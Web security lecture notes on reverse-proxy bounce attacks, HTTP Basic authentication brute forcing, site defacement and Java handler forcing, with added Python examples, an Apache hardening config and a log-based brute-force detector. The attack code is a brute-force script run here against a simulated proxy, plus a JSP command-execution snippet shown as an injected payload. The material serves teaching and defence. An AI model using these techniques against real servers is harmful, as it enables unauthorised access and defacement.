Web Security Notes
Web Security Notes: Scratching the Surface of Web Vulnerabilities and Countermeasures
Outline
• Cyber Graffiti
• Java: Remote Command Execution
• E-Shopping
• Database Access
• Impersonation
• Buffer Overflows: On-the-fly
Part 1: Cyber Graffiti
• Mapping the target network: reading e-mail headers, IP tracing, port scanning, etc.
• Checking which of the server's IP addresses are reachable from the Web.
• Sending raw HTTP requests from tools such as Netcat or WebClient.
• An example: a Web server is running on port 80 and a proxy server on port 8001.
• The proxy server is meant to accept requests only from the local Intranet and the loopback address (127.0.0.1) and to forward them out to the Internet.
• An attack called the Reverse Proxy attack does the opposite: from the outside it sends an HTTP proxy request (one with a full URL in the request line) to port 8001, hoping the proxy will forward it to an inside address.
• If the trick succeeds, the reply may be an HTTP authentication challenge (a 401 with a WWW-Authenticate header) from the internal server instead of a refusal.
• At that point HTTP authentication can be brute forced with tools such as Brutus and WebCracker, or with a script that sends password after password for the user name admin.
• If one of them is accepted, you are logged in.
• A fatal server-side mistake at this stage is leaving directory listing enabled: one request shows the complete layout of the site.
• The next step is to find a way to post your own documents there.
• FTP bugs, Web-accessible upload scripts, etc. can be used to put the defacing document into the staging area.
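The sequence on the last two slides (raw proxy request, reading the challenge, brute forcing Basic authentication, recognising a directory listing) as an added Python example. This is not code from the original slides: the internal host name intranet-www, the password letmein and the replies produced by fake_proxy() are constructed stand-ins so that the example runs offline. In a real test the bytes from build_proxy_request() would be written to the proxy port over a socket, or piped through Netcat, instead of being handed to fake_proxy().

```python
import base64

# Constructed values for the example (not from the original slides).
PROXY_PORT = 8001                  # the proxy port the slides describe
INTERNAL_TARGET = "intranet-www"   # hypothetical host reachable only from inside
INTERNAL_PASSWORD = "letmein"      # hypothetical weak password on the staging area


def build_proxy_request(host, path="/", auth=None):
    """Raw HTTP/1.0 request in proxy (absolute-URI) form.

    A request to an origin server reads 'GET /path HTTP/1.0'; a request to a
    proxy names the whole URL so the proxy knows where to forward it.  'auth'
    is an optional (user, password) pair sent as Basic credentials, which is
    the part a brute-force script varies on every attempt.
    """
    lines = [f"GET http://{host}{path} HTTP/1.0", f"Host: {host}"]
    if auth is not None:
        token = base64.b64encode(f"{auth[0]}:{auth[1]}".encode()).decode()
        lines.append(f"Authorization: Basic {token}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def _parse_headers(header_lines):
    """'Name: value' lines -> dict with lower-cased names; blank lines skipped."""
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return headers


def parse_response(raw):
    """Split a raw HTTP response into (status_code, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode(errors="replace").split("\r\n")
    return int(status_line.split()[1]), _parse_headers(header_lines), body.decode(errors="replace")


def looks_like_directory_listing(body):
    """Apache-style listings carry an 'Index of /...' title; a cheap tell."""
    return "index of /" in body.lower()


def classify(code, headers, body):
    """What one reply tells the attacker about the proxy bounce."""
    if code == 407:
        return "proxy itself demands credentials"
    if code == 401 and "www-authenticate" in headers:
        return "forwarded inside: origin demands credentials"
    if code == 200 and looks_like_directory_listing(body):
        return "forwarded inside: directory listing enabled"
    if code == 200:
        return "forwarded inside"
    return "not forwarded"


def brute_force_basic(send, host, path, user, wordlist):
    """Try each candidate password; return the first one the origin accepts, else None."""
    for password in wordlist:
        code, _, _ = parse_response(send(build_proxy_request(host, path, (user, password))))
        if code != 401:
            return password
    return None


def fake_proxy(raw_request):
    """Constructed stand-in for the misconfigured proxy plus the internal server.

    It forwards anything addressed to INTERNAL_TARGET (the bug), and that
    server answers with a Basic challenge until the right admin password
    arrives, then returns a directory listing of the staging area.
    """
    request_line, *header_lines = raw_request.decode().split("\r\n")
    target = request_line.split()[1]
    headers = _parse_headers(header_lines)
    if not target.startswith(f"http://{INTERNAL_TARGET}/"):
        return b"HTTP/1.0 403 Forbidden\r\n\r\n"
    auth = headers.get("authorization", "")
    if auth.startswith("Basic "):
        user, _, password = base64.b64decode(auth[6:]).decode().partition(":")
        if user == "admin" and password == INTERNAL_PASSWORD:
            body = b'<html><title>Index of /staging</title><a href="deface.html">deface.html</a></html>'
            return b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n" + body
    return b'HTTP/1.0 401 Unauthorized\r\nWWW-Authenticate: Basic realm="staging"\r\n\r\n'


def run_attack(send=fake_proxy):
    """The slides' sequence end to end; returns what each stage found."""
    first = classify(*parse_response(send(build_proxy_request(INTERNAL_TARGET, "/staging/"))))
    password = brute_force_basic(send, INTERNAL_TARGET, "/staging/", "admin",
                                 ["password", "admin", "123456", "letmein"])
    if password is None:
        return first, None, None
    final = classify(*parse_response(send(
        build_proxy_request(INTERNAL_TARGET, "/staging/", ("admin", password)))))
    return first, password, final


if __name__ == "__main__":
    print(run_attack())
```

The telling signal is the first reply: a 407 means the proxy is guarding itself, a 403 means the bounce was refused, but a 401 with a WWW-Authenticate header came from the inside host, which proves the proxy forwarded the request inward and gives the brute-force loop something to work on.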
• The staging area is later pushed to the ISP's production Web server, and the defacement goes live with it.
• Countermeasures:
– Turning off reverse proxying: this is Web-server dependent; with Apache, use the Listen directive to bind the proxy port to the internal network interface only, so that it cannot be reached from the Internet.
– Using stronger HTTP authentication passwords: long passwords that include symbols, digits, etc. A properly designed Web server should detect repeated failed authentication attempts, but most do NOT, so it is the administrator's responsibility to check the logs.
– Turning off directory browsing: in Apache use the Directory section in httpd.conf (Options -Indexes); in IIS uncheck the directory browsing check box in the configuration interface.
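The first and third countermeasures as an added Apache httpd 2.4 configuration fragment; it is not from the original slides. It assumes mod_proxy is loaded, that the internal interface is 10.0.0.5 (a hypothetical address) and that the public site lives under /var/www/html. The Listen binding is what the slide calls for; the ProxyRequests and Require lines are a second layer so that a bounced request is refused even if the listener is ever widened.

```apache
# Added example, not from the original slides.
# Assumed: Apache httpd 2.4 with mod_proxy, internal interface 10.0.0.5.

# 1. Keep the proxy port off the Internet: the public listener stays on
#    port 80 on every interface, the proxy listener only on the internal one.
Listen 0.0.0.0:80
Listen 10.0.0.5:8001

# 2. Forward proxying is only for internal clients.  Even if someone later
#    changes the Listen line, requests from outside the Intranet are refused.
<VirtualHost 10.0.0.5:8001>
    ProxyRequests On
    <Proxy "*">
        Require ip 10.0.0.0/8 127.0.0.1
    </Proxy>
</VirtualHost>

# 3. The public site: no proxying at all, and no directory listings.
<VirtualHost *:80>
    DocumentRoot "/var/www/html"
    ProxyRequests Off
    <Directory "/var/www/html">
        # Options -Indexes turns off directory browsing (slide 3's third fix)
        Options -Indexes
        Require all granted
    </Directory>
</VirtualHost>
```

The weak setting the slides warn about is the same server with `Listen 8001` (all interfaces) and no `<Proxy>` block: then any host on the Internet can ask the proxy to fetch an internal URL on its behalf.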
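The second countermeasure ends with "check the logs"; this added Python example shows what that check looks like over Apache combined-format access-log lines. It is not code from the original slides. The log lines in SAMPLE_LOG are constructed for the example (one client hammering a Basic-protected staging directory and finally getting in, one ordinary user mistyping a password once); the threshold and window are parameters, not values the slides give.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" access-log format.  The third field is the user name the
# client presented; Apache logs it even when the answer was 401, which is
# exactly the trail a brute-force run leaves behind.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - admin [10/Oct/2000:13:55:36 -0700] "GET /staging/ HTTP/1.0" 401 389 "-" "Brutus/AET2"
203.0.113.7 - admin [10/Oct/2000:13:55:37 -0700] "GET /staging/ HTTP/1.0" 401 389 "-" "Brutus/AET2"
203.0.113.7 - admin [10/Oct/2000:13:55:37 -0700] "GET /staging/ HTTP/1.0" 401 389 "-" "Brutus/AET2"
203.0.113.7 - admin [10/Oct/2000:13:55:38 -0700] "GET /staging/ HTTP/1.0" 401 389 "-" "Brutus/AET2"
203.0.113.7 - admin [10/Oct/2000:13:55:39 -0700] "GET /staging/ HTTP/1.0" 401 389 "-" "Brutus/AET2"
203.0.113.7 - admin [10/Oct/2000:13:55:40 -0700] "GET /staging/ HTTP/1.0" 200 2342 "-" "Brutus/AET2"
198.51.100.4 - - [10/Oct/2000:13:56:02 -0700] "GET /index.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0"
198.51.100.4 - bob [10/Oct/2000:13:56:30 -0700] "GET /staging/ HTTP/1.0" 401 389 "-" "Mozilla/4.0"
"""


def parse_line(line):
    """Return the fields the check needs from one combined-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "user": m.group("user"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_brute_force(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag clients with at least `threshold` 401s inside any `window`.

    For each flagged client also report the user names tried and whether a
    later 200 on one of the same protected paths suggests the guessing worked.
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            by_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        fails = [r for r in recs if r["status"] == 401]
        # sliding window over the failed attempts, oldest to newest
        best, start = 0, 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            best = max(best, end - start + 1)
        if best < threshold:
            continue
        protected = {r["path"] for r in fails}
        last_fail = fails[-1]["ts"]
        broke_in = any(r["status"] == 200 and r["path"] in protected and r["ts"] >= last_fail
                       for r in recs)
        alerts[ip] = {
            "attempts": best,
            "users": sorted({r["user"] for r in fails}),
            "broke_in": broke_in,
        }
    return alerts


if __name__ == "__main__":
    for ip, info in find_brute_force(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

A 401 burst followed by a 200 on the same path from the same client is the case to treat as a compromise rather than a nuisance: the password was guessed, and anything pushed into the staging area after that timestamp needs to be reviewed before it goes to the production server.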
Part 2: Java: Remote Command Execution
• The problem is that a Java-based Web server has several file types to process, each with its own handler:
– HTML: handled by FileServlet
– JSP: handled by JSPServlet
– Servlets: handled by the servlet engine
– SSI: handled by the SSI handler
• An attack called handler forcing simply tries to invoke a handler on a file type other than the one it was designed to handle.
• The vulnerability has been exploited in many products, including WebLogic, WebSphere and Sun Java Web Server.
• It can be used to disclose source code or to run remote commands.
• One example: put Java code into the feedback file, which is an HTML file written from user input, then request that file through the JSP handler.
• Sample URL:
– www.acmetradeonline/*.shtml/feebback/feedback.jsp
• The server's configuration file maps every request that looks like a .jsp request to JSPServlet, based on the URL rather than on the file that actually exists. Here is the problem: the JSP engine compiles and runs whatever that file contains.
• Countermeasures: hardening the Java server
– Sanitize input: do not store user-supplied feedback where a script handler can be pointed at it (or do not accept feedback files at all).
– Remove installation sample files: a general recommendation; a number of exploits succeed only because the samples are there.
– Restrict executables: remove cmd.exe, ftp.exe, etc. from the production system, or restrict access to them.
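Handler forcing as an added Python example; this is not code from the slides or from any of the servers named above. It models only the dispatch decision: DOCROOT and HANDLERS are constructed stand-ins for the server's file tree and its extension-to-handler mapping, and the content of feedback.html is a made-up JSP snippet standing in for what an attacker would type into the feedback form. The vulnerable dispatcher picks the handler from the URL suffix and then walks back up the path to find something to serve; the hardened one picks the handler from the file that really exists and refuses URLs with extra segments after a static file.

```python
import posixpath

# Constructed document root (not a real server): only search.jsp is meant to
# be executed; feedback.html is data written from a hypothetical feedback form.
DOCROOT = {
    "/index.html": "<html>welcome</html>",
    "/feedback/feedback.html": '<% Runtime.getRuntime().exec("cmd.exe /c dir"); %>',
    "/search.jsp": '<% out.print(request.getParameter("q")); %>',
}

# Extension -> handler mapping, as a server's configuration file would list it.
HANDLERS = {".html": "FileServlet", ".jsp": "JSPServlet", ".shtml": "SSIHandler"}


def choose_handler_vulnerable(url_path):
    """Dispatch on the extension of the URL: the mistake behind handler forcing.

    '*.jsp -> JSPServlet' is applied to the request string, so a URL such as
    '/feedback/feedback.html/x.jsp' is routed to the JSP engine.  The engine
    then strips trailing segments (path info) until it finds a file, which is
    how it ends up compiling feedback.html.  Returns (handler, file) or None.
    """
    handler = HANDLERS.get(posixpath.splitext(url_path)[1])
    if handler is None:
        return None
    candidate = url_path
    while candidate not in DOCROOT:
        parent = posixpath.dirname(candidate)
        if parent == candidate:          # reached the root without a match
            return None
        candidate = parent
    return handler, candidate


def choose_handler_hardened(url_path):
    """Dispatch on the real file's extension and allow no path info for it.

    1. Reject traversal before normalising.
    2. The normalised URL must name an existing file exactly.
    3. The handler comes from that file's own extension, so user-supplied
       .html content is only ever served as static text.
    """
    if ".." in url_path.split("/"):
        return None
    norm = posixpath.normpath(url_path)
    if not norm.startswith("/") or norm not in DOCROOT:
        return None
    handler = HANDLERS.get(posixpath.splitext(norm)[1])
    if handler is None:
        return None
    return handler, norm


def executes_user_content(chooser, url_path):
    """True if `chooser` would hand the user-written feedback file to the JSP engine."""
    result = chooser(url_path)
    return result == ("JSPServlet", "/feedback/feedback.html")


if __name__ == "__main__":
    forced = "/feedback/feedback.html/x.jsp"
    print("vulnerable:", choose_handler_vulnerable(forced))
    print("hardened:  ", choose_handler_hardened(forced))
```

The same check applies to the other handlers in the list: with the vulnerable dispatcher a trailing `/x.shtml` would push a plain HTML file through the SSI handler, which is why the fix keys the decision on the real file rather than on anything the client appended to the URL.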